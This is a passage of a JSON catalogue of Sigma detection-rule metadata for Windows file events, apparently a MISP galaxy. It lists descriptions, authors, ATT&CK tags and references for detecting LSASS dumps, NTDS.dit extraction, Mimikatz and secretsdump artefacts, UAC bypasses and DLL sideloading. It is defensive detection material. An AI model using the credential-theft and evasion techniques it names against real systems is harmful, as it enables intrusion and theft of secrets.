"windows", "refs": [ "https://threathunterplaybook.com/hunts/windows/201009-RemoteDCOMIErtUtilDLLHijack/notebook.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_dcom_iertutil_dll_hijack.yml" ], "tags": [ "attack.lateral-movement", "attack.t1021.002", "attack.t1021.003" ] }, "related": [ { "dest-uuid": "4f9ca633-15c5-463c-9724-bdcd54fde541", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "68a0c5ed-bee2-4513-830d-5b0d650139bd", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "2f7979ae-f82b-45af-ac1d-2b10e93b0baa", "value": "Potential DCOM InternetExplorer.Application DLL Hijack" }, { "description": "Detects javaw.exe in AppData folder as used by Adwind / JRAT", "meta": { "author": "Florian Roth (Nextron Systems), Tom Ueltschi, Jonhnathan Ribeiro, oscd.community", "creation_date": "2017-11-10", "falsepositive": "No established falsepositives", "filename": "file_event_win_mal_adwind.yml", "level": "high", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://www.hybrid-analysis.com/sample/ba86fa0d4b6af2db0656a88b1dd29f36fe362473ae8ad04255c4e52f214a541c?environmentId=100", "https://www.first.org/resources/papers/conf2017/Advanced-Incident-Detection-and-Threat-Hunting-using-Sysmon-and-Splunk.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_mal_adwind.yml" ], "tags": [ "attack.execution", "attack.t1059.005", "attack.t1059.007" ] }, "related": [ { "dest-uuid": "dfd7cc1d-e1d8-4394-a198-97c4cab8aa67", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "0bcfabcb-7929-47f4-93d6-b33fb67d34d1", "value": "Adwind RAT / JRAT File Artifact" }, { "description": "Detects the creation of log files during a TeamViewer remote session", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-01-30", "falsepositive": [ "Legitimate uses of TeamViewer in an organisation" ], "filename": "file_event_win_susp_teamviewer_remote_session.yml", "level": "medium", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://www.teamviewer.com/en-us/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_teamviewer_remote_session.yml" ], "tags": [ "attack.command-and-control", "attack.t1219" ] }, "related": [ { "dest-uuid": "4061e78c-1284-44b4-9116-73e4ac3912f7", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "162ab1e4-6874-4564-853c-53ec3ab8be01", "value": "TeamViewer Remote Session" }, { "description": "Detects creation of a malicious DLL file in the location where the OneDrive or Team applications\nUpon execution of the Teams or OneDrive application, the dropped malicious DLL file (\"iphlpapi.dll\") is sideloaded\n", "meta": { "author": "frack113", "creation_date": "2022-08-12", "falsepositive": [ "Unknown" ], "filename": "file_event_win_iphlpapi_dll_sideloading.yml", "level": "high", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://blog.cyble.com/2022/07/27/targeted-attacks-being-carried-out-via-dll-sideloading/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_iphlpapi_dll_sideloading.yml" ], "tags": [ "attack.persistence", "attack.privilege-escalation", "attack.defense-evasion", "attack.t1574.002" ] }, "related": [ { "dest-uuid": "e64c62cf-9cd7-4a14-94ec-cdaac43ab44b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "1908fcc1-1b92-4272-8214-0fbaf2fa5163", "value": "Malicious DLL File Dropped in the Teams or OneDrive Folder" }, { "description": "Detects the presence of unicode characters which are homoglyphs, or identical in appearance, to ASCII letter characters.\nThis is used as an obfuscation and masquerading techniques. Only \"perfect\" homoglyphs are included; these are characters that\nare indistinguishable from ASCII characters and thus may make excellent candidates for homoglyph attack characters.\n", "meta": { "author": "Micah Babinski, @micahbabinski", "creation_date": "2023-05-08", "falsepositive": [ "File names with legitimate Cyrillic text. Will likely require tuning (or not be usable) in countries where these alphabets are in use." ], "filename": "file_event_win_susp_homoglyph_filename.yml", "level": "medium", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "http://www.irongeek.com/homoglyph-attack-generator.php", "https://redcanary.com/threat-detection-report/threats/socgholish/#threat-socgholish", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_homoglyph_filename.yml" ], "tags": [ "attack.defense-evasion", "attack.t1036", "attack.t1036.003" ] }, "related": [ { "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "bd5b58a4-a52d-4a29-bc0d-3f1d3968eb6b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "4f1707b1-b50b-45b4-b5a2-3978b5a5d0d6", "value": "Potential Homoglyph Attack Using Lookalike Characters in Filename" }, { "description": "Detects WerFault creating a dump file with a name that indicates that the dump file could be an LSASS process memory, which contains user credentials", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-06-27", "falsepositive": [ "Unknown" ], "filename": "file_event_win_lsass_werfault_dump.yml", "level": "high", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://github.com/helpsystems/nanodump", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_lsass_werfault_dump.yml" ], "tags": [ "attack.credential-access", "attack.t1003.001" ] }, "related": [ { "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "c3e76af5-4ce0-4a14-9c9a-25ceb8fda182", "value": "WerFault LSASS Process Memory Dump" }, { "description": "Detects programs on a Windows system that should not write executables to disk", "meta": { "author": "frack113, Florian Roth (Nextron Systems)", "creation_date": "2022-08-21", "falsepositive": [ "Unknown" ], "filename": "file_event_win_susp_legitimate_app_dropping_exe.yml", "level": "high", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://github.com/Neo23x0/sysmon-config/blob/3f808d9c022c507aae21a9346afba4a59dd533b9/sysmonconfig-export-block.xml#L1326", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_legitimate_app_dropping_exe.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f0540f7e-2db3-4432-b9e0-3965486744bc", "value": "Legitimate Application Dropped Executable" }, { "description": "Detects creation of a file named \"ntds.dit\" (Active Directory Database) by an uncommon process or a process located in a suspicious directory", "meta": { "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-01-11", "falsepositive": [ "Unknown" ], "filename": "file_event_win_ntds_dit_uncommon_process.yml", "level": "high", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://adsecurity.org/?p=2398", "https://stealthbits.com/blog/extracting-password-hashes-from-the-ntds-dit-file/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_ntds_dit_uncommon_process.yml" ], "tags": [ "attack.credential-access", "attack.t1003.002", "attack.t1003.003" ] }, "related": [ { "dest-uuid": "1644e709-12d2-41e5-a60f-3470991f5011", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "edf91964-b26e-4b4a-9600-ccacd7d7df24", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "11b1ed55-154d-4e82-8ad7-83739298f720", "value": "NTDS.DIT Creation By Uncommon Process" }, { "description": "Aversaries may use to interact with a remote network share using Server Message Block (SMB).\nThis technique is used by post-exploitation frameworks.\n", "meta": { "author": "frack113", "creation_date": "2022-01-01", "falsepositive": [ "Unknown" ], "filename": "file_event_win_writing_local_admin_share.yml", "level": "medium", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.002/T1021.002.md#atomic-test-4---execute-command-writing-output-to-local-admin-share", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_writing_local_admin_share.yml" ], "tags": [ "attack.lateral-movement", "attack.t1546.002" ] }, "related": [ { "dest-uuid": "ce4b7013-640e-48a9-b501-d0025a95f4bf", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "4aafb0fa-bff5-4b9d-b99e-8093e659c65f", "value": "Writing Local Admin Share" }, { "description": "Detects suspicious activity in which the MSExchangeMailboxReplication process writes .asp and .apsx files to disk, which could be a sign of ProxyShell exploitation", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-02-25", "falsepositive": [ "Unknown" ], "filename": "file_event_win_susp_exchange_aspx_write.yml", "level": "high", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://redcanary.com/blog/blackbyte-ransomware/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_exchange_aspx_write.yml" ], "tags": [ "attack.initial-access", "attack.t1190", "attack.persistence", "attack.t1505.003" ] }, "related": [ { "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "5d0d3609-d06d-49e1-b9c9-b544e0c618cb", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "7280c9f3-a5af-45d0-916a-bc01cb4151c9", "value": "Suspicious MSExchangeMailboxReplication ASPX Write" }, { "description": "Detects the creation of an executable with a system process name in folders other than the system ones (System32, SysWOW64, etc.).\nIt is highly recommended to perform an initial baseline before using this rule in production.\n", "meta": { "author": "Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2020-05-26", "falsepositive": [ "System processes copied outside their default folders for testing purposes", "Third party software naming their software with the same names as the processes mentioned here" ], "filename": "file_event_win_creation_system_file.yml", "level": "medium", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_creation_system_file.yml" ], "tags": [ "attack.defense-evasion", "attack.t1036.005" ] }, "related": [ { "dest-uuid": "1c4e5d32-1fe9-4116-9d9d-59e3925bd6a2", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "d5866ddf-ce8f-4aea-b28e-d96485a20d3d", "value": "Files With System Process Name In Unsuspected Locations" }, { "description": "Detects default filenames output from the execution of CrackMapExec and Impacket-secretsdump against an endpoint.", "meta": { "author": "SecurityAura", "creation_date": "2022-11-16", "falsepositive": [ "Unknown" ], "filename": "file_event_win_hktl_remote_cred_dump.yml", "level": "high", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://github.com/SecureAuthCorp/impacket/blob/master/examples/secretsdump.py", "https://github.com/Porchetta-Industries/CrackMapExec", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_hktl_remote_cred_dump.yml" ], "tags": [ "attack.credential-access", "attack.t1003" ] }, "related": [ { "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "6e2a900a-ced9-4e4a-a9c2-13e706f9518a", "value": "HackTool - Potential Remote Credential Dumping Activity Via CrackMapExec Or Impacket-Secretsdump" }, { "description": "Detects the pattern of UAC Bypass using IEInstal.exe (UACMe 64)", "meta": { "author": "Christian Burkard (Nextron Systems)", "creation_date": "2021-08-30", "falsepositive": [ "Unknown" ], "filename": "file_event_win_uac_bypass_ieinstal.yml", "level": "high", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://github.com/hfiref0x/UACME", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_uac_bypass_ieinstal.yml" ], "tags": [ "attack.defense-evasion", "attack.privilege-escalation", "attack.t1548.002" ] }, "related": [ { "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "bdd8157d-8e85-4397-bb82-f06cc9c71dbb", "value": "UAC Bypass Using IEInstal - File" }, { "description": "Detects creation of files with the \".pub\" extension in suspicious or uncommon locations. This could be a sign of attackers abusing Publisher documents", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-02-08", "falsepositive": [ "Legitimate usage of \".pub\" files from those locations" ], "filename": "file_event_win_office_publisher_files_in_susp_locations.yml", "level": "medium", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://twitter.com/EmericNasi/status/1623224526220804098", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_office_publisher_files_in_susp_locations.yml" ], "tags": [ "attack.defense-evasion" ] }, "uuid": "3d2a2d59-929c-4b78-8c1a-145dfe9e07b1", "value": "Publisher Attachment File Dropped In Suspicious Location" }, { "description": "Detects PowerShell creating a binary executable or a script file.", "meta": { "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-03-17", "falsepositive": [ "False positives will differ depending on the environment and scripts used. Apply additional filters accordingly." ], "filename": "file_event_win_powershell_drop_binary_or_script.yml", "level": "medium", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://www.zscaler.com/blogs/security-research/onenote-growing-threat-malware-distribution", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_powershell_drop_binary_or_script.yml" ], "tags": [ "attack.persistence" ] }, "uuid": "7047d730-036f-4f40-b9d8-1c63e36d5e62", "value": "Potential Binary Or Script Dropper Via PowerShell" }, { "description": "Detects Windows shells and scripting applications that write files to suspicious folders", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2021-11-20", "falsepositive": [ "Unknown" ], "filename": "file_event_win_shell_write_susp_directory.yml", "level": "high", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_shell_write_susp_directory.yml" ], "tags": [ "attack.execution", "attack.t1059" ] }, "related": [ { "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "1277f594-a7d1-4f28-a2d3-73af5cbeab43", "value": "Windows Shell/Scripting Application File Write to Suspicious Folder" }, { "description": "Detects the creation of a file with an uncommon extension in an Office application startup folder", "meta": { "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-06-05", "falsepositive": [ "False positive might stem from rare extensions used by other Office utilities." ], "filename": "file_event_win_office_uncommon_file_startup.yml", "level": "high", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://app.any.run/tasks/d6fe6624-6ef8-485d-aa75-3d1bdda2a08c/", "http://addbalance.com/word/startup.htm", "https://en.wikipedia.org/wiki/List_of_Microsoft_Office_filename_extensions", "https://answers.microsoft.com/en-us/msoffice/forum/all/document-in-word-startup-folder-doesnt-open-when/44ab0932-2917-4150-8cdc-2f2cf39e86f3", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_office_uncommon_file_startup.yml" ], "tags": [ "attack.resource-development", "attack.t1587.001" ] }, "related": [ { "dest-uuid": "212306d8-efa4-44c9-8c2d-ed3d2e224aa0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a10a2c40-2c4d-49f8-b557-1a946bc55d9d", "value": "Uncommon File Created In Office Startup Folder" }, { "description": "Detects file names with specific patterns seen generated and used by tools such as Mimikatz and DSInternals related to exported or stolen DPAPI backup keys and certificates.\n", "meta": { "author": "Nounou Mbeiri, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2024-06-26", "falsepositive": [ "Unlikely" ], "filename": "file_event_win_susp_dpapi_backup_and_cert_export_ioc.yml", "level": "high", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://www.dsinternals.com/en/dpapi-backup-key-theft-auditing/", "https://github.com/MichaelGrafnetter/DSInternals/blob/39ee8a69bbdc1cfd12c9afdd7513b4788c4895d4/Src/DSInternals.Common/Data/DPAPI/DPAPIBackupKey.cs#L28-L32", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_dpapi_backup_and_cert_export_ioc.yml" ], "tags": [ "attack.t1555", "attack.t1552.004" ] }, "related": [ { "dest-uuid": "3fc9b85a-2862-4363-a64d-d692e3ffbee0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "60b508a1-6a5e-46b1-821a-9f7b78752abf", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "7892ec59-c5bb-496d-8968-e5d210ca3ac4", "value": "DPAPI Backup Keys And Certificate Export Activity IOC" }, { "description": "Detects the creation of files created by mimikatz such as \".kirbi\", \"mimilsa.log\", etc.", "meta": { "author": "Florian Roth (Nextron Systems), David ANDRE", "creation_date": "2021-11-08", "falsepositive": [ "Unlikely" ], "filename": "file_event_win_hktl_mimikatz_files.yml", "level": "critical", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://cobalt.io/blog/kerberoast-attack-techniques", "https://pentestlab.blog/2019/10/21/persistence-security-support-provider/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_hktl_mimikatz_files.yml" ], "tags": [ "attack.credential-access", "attack.t1558" ] }, "related": [ { "dest-uuid": "3fc01293-ef5e-41c6-86ce-61f10706b64a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "9e099d99-44c2-42b6-a6d8-54c3545cab29", "value": "HackTool - Mimikatz Kirbi File Creation" }, { "description": "Detects creation of new \".dll\" files inside the plugins directory of a notepad++ installation by a process other than \"gup.exe\". Which could indicates possible persistence", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-06-10", "falsepositive": [ "Possible FPs during first installation of Notepad++", "Legitimate use of custom plugins by users in order to enhance notepad++ functionalities" ], "filename": "file_event_win_notepad_plus_plus_persistence.yml", "level": "medium", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://pentestlab.blog/2022/02/14/persistence-notepad-plugins/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_notepad_plus_plus_persistence.yml" ], "tags": [ "attack.persistence" ] }, "uuid": "54127bd4-f541-4ac3-afdb-ea073f63f692", "value": "Potential Persistence Via Notepad++ Plugins" }, { "description": "Detects the creation of known offensive powershell scripts used for exploitation", "meta": { "author": "Markus Neis, Nasreddine Bencherchali (Nextron Systems), Mustafa Kaan Demir, Georg Lauenstein", "creation_date": "2018-04-07", "falsepositive": [ "Unknown" ], "filename": "file_event_win_powershell_exploit_scripts.yml", "level": "high", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://web.archive.org/web/20210511204621/https://github.com/AlsidOfficial/WSUSpendu", "https://github.com/CsEnox/EventViewer-UACBypass", "https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/", "https://github.com/BC-SECURITY/Invoke-ZeroLogon/blob/111d17c7fec486d9bb23387e2e828b09a26075e4/Invoke-ZeroLogon.ps1", "https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/", "https://github.com/NetSPI/PowerUpSQL", "https://github.com/DarkCoderSc/PowerRunAsSystem/", "https://github.com/samratashok/nishang", "https://github.com/adrecon/AzureADRecon", "https://github.com/nettitude/Invoke-PowerThIEf", "https://github.com/S3cur3Th1sSh1t/WinPwn", "https://github.com/HarmJ0y/DAMP", "https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/6f23bb41f9675d7e2d32bacccff75e931ae00554/OfficeMemScraper.ps1", "https://github.com/PowerShellMafia/PowerSploit", "https://github.com/Kevin-Robertson/Powermad", "https://github.com/adrecon/ADRecon", "https://github.com/xorrior/RandomPS-Scripts/blob/848c919bfce4e2d67b626cbcf4404341cfe3d3b6/Get-DXWebcamVideo.ps1", "https://github.com/S3cur3Th1sSh1t/PowerSharpPack/tree/master/PowerSharpBinaries", "https://github.com/besimorhino/powercat", "https://github.com/dafthack/DomainPasswordSpray/blob/b13d64a5834694aa73fd2aea9911a83027c465a7/DomainPasswordSpray.ps1", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_powershell_exploit_scripts.yml" ], "tags": [ "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f331aa1f-8c53-4fc3-b083-cc159bc971cb", "value": "Malicious PowerShell Scripts - FileCreation" }, { "description": "When C# is compiled dynamically, a .cmdline file will be created as a part of the process.\nCertain processes are not typically observed compiling C# code, but can do so without touching disk.\nThis can be used to unpack a payload for execution\n", "meta": { "author": "frack113", "creation_date": "2022-01-09", "falsepositive": [ "Unknown" ], "filename": "file_event_win_csharp_compile_artefact.yml", "level": "low", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027.004/T1027.004.md#atomic-test-2---dynamic-c-compile", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_csharp_compile_artefact.yml" ], "tags": [ "attack.defense-evasion", "attack.t1027.004" ] }, "related": [ { "dest-uuid": "c726e0a2-a57a-4b7b-a973-d0f013246617", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e4a74e34-ecde-4aab-b2fb-9112dd01aed0", "value": "Dynamic CSharp Compile Artefact" }, { "description": "Detects the creation of an \"lsass.dmp\" file by the taskmgr process. This indicates a manual dumping of the LSASS.exe process memory using Windows Task Manager.", "meta": { "author": "Swachchhanda Shrawan Poudel", "creation_date": "2023-10-19", "falsepositive": [ "Rare case of troubleshooting by an administrator or support that has to be investigated regardless" ], "filename": "file_event_win_taskmgr_lsass_dump.yml", "level": "high", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/987e3ca988ae3cff4b9f6e388c139c05bf44bbb8/atomics/T1003.001/T1003.001.md#L1", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_taskmgr_lsass_dump.yml" ], "tags": [ "attack.credential-access", "attack.t1003.001" ] }, "related": [ { "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "69ca12af-119d-44ed-b50f-a47af0ebc364", "value": "LSASS Process Memory Dump Creation Via Taskmgr.EXE" }, { "description": "Detects creation of the PSEXEC key file. Which is created anytime a PsExec command is executed. It gets written to the file system and will be recorded in the USN Journal on the target system", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-01-21", "falsepositive": [ "Unlikely" ], "filename": "file_event_win_sysinternals_psexec_service_key.yml", "level": "high", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://aboutdfir.com/the-key-to-identify-psexec/", "https://twitter.com/davisrichardg/status/1616518800584704028", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_sysinternals_psexec_service_key.yml" ], "tags": [ "attack.lateral-movement", "attack.privilege-escalation", "attack.execution", "attack.persistence", "attack.t1136.002", "attack.t1543.003", "attack.t1570", "attack.s0029" ] }, "related": [ { "dest-uuid": "7610cada-1499-41a4-b3dd-46467b68d177", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "2959d63f-73fd-46a1-abd2-109d7dcede32", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "bf90d72c-c00b-45e3-b3aa-68560560d4c5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "304afd73-55a5-4bb9-8c21-0b1fc84ea9e4", "value": "PSEXEC Remote Execution File Artefact" }, { "description": "Detects creation of files with names used by different memory dumping tools to create a memory dump of the LSASS process memory, which contains user credentials.", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2021-11-15", "falsepositive": [ "Unknown" ], "filename": "file_event_win_lsass_default_dump_file_names.yml", "level": "high", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://www.whiteoaksecurity.com/blog/attacks-defenses-dumping-lsass-no-mimikatz/", "https://github.com/helpsystems/nanodump", "https://www.google.com/search?q=procdump+lsass", "https://github.com/ricardojoserf/NativeDump/blob/01d8cd17f31f51f5955a38e85cd3c83a17596175/NativeDump/Program.cs#L258", "https://github.com/elastic/detection-rules/blob/c76a39796972ecde44cb1da6df47f1b6562c9770/rules/windows/credential_access_lsass_memdump_file_created.toml", "https://github.com/CCob/MirrorDump", "https://github.com/safedv/RustiveDump/blob/1a9b026b477587becfb62df9677cede619d42030/src/main.rs#L35", "https://medium.com/@markmotig/some-ways-to-dump-lsass-exe-c4a75fdc49bf", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_lsass_default_dump_file_names.yml" ], "tags": [ "attack.credential-access", "attack.t1003.001" ] }, "related": [ { "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a5a2d357-1ab8-4675-a967-ef9990a59391", "value": "LSASS Process Memory Dump Files" }, { "description": "Detects the pattern of UAC Bypass using NTFS reparse point and wusa.exe DLL hijacking (UACMe 36)", "meta": { "author": "Christian Burkard (Nextron Systems)", "creation_date": "2021-08-30", "falsepositive": [ "Unknown" ], "filename": "file_event_win_uac_bypass_ntfs_reparse_point.yml", "level": "high", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://github.com/hfiref0x/UACME", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_uac_bypass_ntfs_reparse_point.yml" ], "tags": [ "attack.defense-evasion", "attack.privilege-escalation", "attack.t1548.002" ] }, "related": [ { "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "7fff6773-2baa-46de-a24a-b6eec1aba2d1", "value": "UAC Bypass Using NTFS Reparse Point - File" }, { "description": "Detects the creation of tasks from processes executed from suspicious locations", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2021-11-16", "falsepositive": [ "Unknown" ], "filename": "file_event_win_susp_task_write.yml", "level": "high", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_task_write.yml" ], "tags": [ "attack.persistence", "attack.execution", "attack.t1053" ] }, "related": [ { "dest-uuid": "35dd844a-b219-4e2b-a6bb-efa9a75995a9", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "80e1f67a-4596-4351-98f5-a9c3efabac95", "value": "Suspicious Scheduled Task Write to System32 Tasks" }, { "description": "Detects the creation of recent element file that points to an .ISO, .IMG, .VHD or .VHDX file as often used in phishing attacks.\nThis can be a false positive on server systems but on workstations users should rarely mount .iso or .img files.\n", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-02-11", "falsepositive": [ "Cases in which a user mounts an image file for legitimate reasons" ], "filename": "file_event_win_iso_file_recent.yml", "level": "medium", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/malicious-spam-campaign-uses-iso-image-files-to-deliver-lokibot-and-nanocore", "https://blog.emsisoft.com/en/32373/beware-new-wave-of-malware-spreads-via-iso-file-email-attachments/", "https://insights.sei.cmu.edu/blog/the-dangers-of-vhd-and-vhdx-files/", "https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_iso_file_recent.yml" ], "tags": [ "attack.initial-access", "attack.t1566.001" ] }, "related": [ { "dest-uuid": "2e34237d-8574-43f6-aace-ae2915de8597", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "4358e5a5-7542-4dcb-b9f3-87667371839b", "value": "ISO or Image Mount Indicator in Recent Files" }, { "description": "Adversaries may execute their own malicious payloads by hijacking vulnerable file path references.\nAdversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.\n", "meta": { "author": "frack113", "creation_date": "2021-12-30", "falsepositive": [ "Unknown" ], "filename": "file_event_win_creation_unquoted_service_path.yml", "level": "high", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ 